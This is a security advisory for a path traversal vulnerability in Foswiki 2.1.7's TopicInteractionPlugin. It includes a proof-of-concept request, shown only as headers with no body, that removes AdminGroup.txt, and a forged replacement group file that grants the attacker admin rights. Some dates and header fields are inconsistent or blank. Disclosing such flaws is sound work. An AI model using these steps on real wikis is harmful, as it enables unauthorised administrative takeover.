usd-2022-0014 | Foswiki 2.1.7 Path Traversal

Advisory ID: usd-2022-0014
Product: Foswiki
Affected Version: 2.1.7
Vulnerability Type:
Security Risk: High
Vendor URL:
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
Advisory Status: Closed
Last Update: 2022-01-22


The TopicInteractionPlugin allows relative path traversal by changing the filename parameter. The plugin moves attachments to other wiki pages. These attachments are stored in pub/<web>/<topic> directory. The content of the wiki pages are stored in data/ directory. Going back three directories allows to move files outside the pub directory (e.g. the AdminGroup.txt file which handles the permissions to the backend configuration pages.)

Proof of Concept

The following requests (re)moves the file AdminGroup.txt of the Main web, which allows an attacker to create a new one afterwards and become AdminGroup member.

The following request remove the file "AdminGroup.txt":

POST /bin/rest/TopicInteractionPlugin/move HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 129
Origin: http://localhost
Connection: close
Referer: http://localhost/Main/ChrisChris
Cookie: FOSWIKISID=582be25dd6c36a6d45e6a37277378374; FOSWIKISTRIKEONE=21d8825b6b492836f1235aa0293bc310
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin



Afterwards a user can create a new one, which contains their username and become an admin.

The following content can be used for a new AdminGroup.txt file.

%META:TOPICINFO{author="BaseUserMapping_999" comment="" date="1648462765" format="1.1" version="1"}%

%INCLUDE{"%USERSWEB%.AdminUser" section="sudo_login"}%

%IF{"(NOT defined GROUP) OR $GROUP = ''" then='
<sticky><div class="foswikiNotification"></sticky>
*How to add the first administrator* %BR%
If you haven\'t previously set up an administrator, follow these steps: (*Note:* This help text will disappear once you have added a user to this group.)
$percntINCLUDE{"%SYSTEMWEB%.InstallationGuide" section="addadmin"}$percnt

More information on Administrators, and on how to use the AdminGroup is found in the [[%SYSTEMWEB%.InstallationGuide#DefineAdminUser][Installation Guide]]

You can edit this topic to add a description to the AdminGroup

%META:PREFERENCE{name="GROUP" title="GROUP" type="Set" value=""}%
%META:PREFERENCE{name="ALLOWTOPICCHANGE" title="ALLOWTOPICCHANGE" type="Set" value="AdminGroup,ChrisChris"}%
%META:PREFERENCE{name="VIEW_TEMPLATE" title="VIEW_TEMPLATE" type="Set" value="GroupView"}


The "ALLOWTOPICCHANGE" permission contains our username, which allows us to become an admin user.


Restrict the movement of attachments to the pub directory.



  • 2022-01-05: Vulnerability identified by Christian Pöschl
  • 2022-04-27: First contact request made to the vendor
  • 2022-05-05: Second contact request made to the vendor
  • 2022-06-09: Share vulnerability details with vendor
  • 2022-06-09: Fix released by vendor


This security vulnerability was found by Christian Pöschl of usd AG.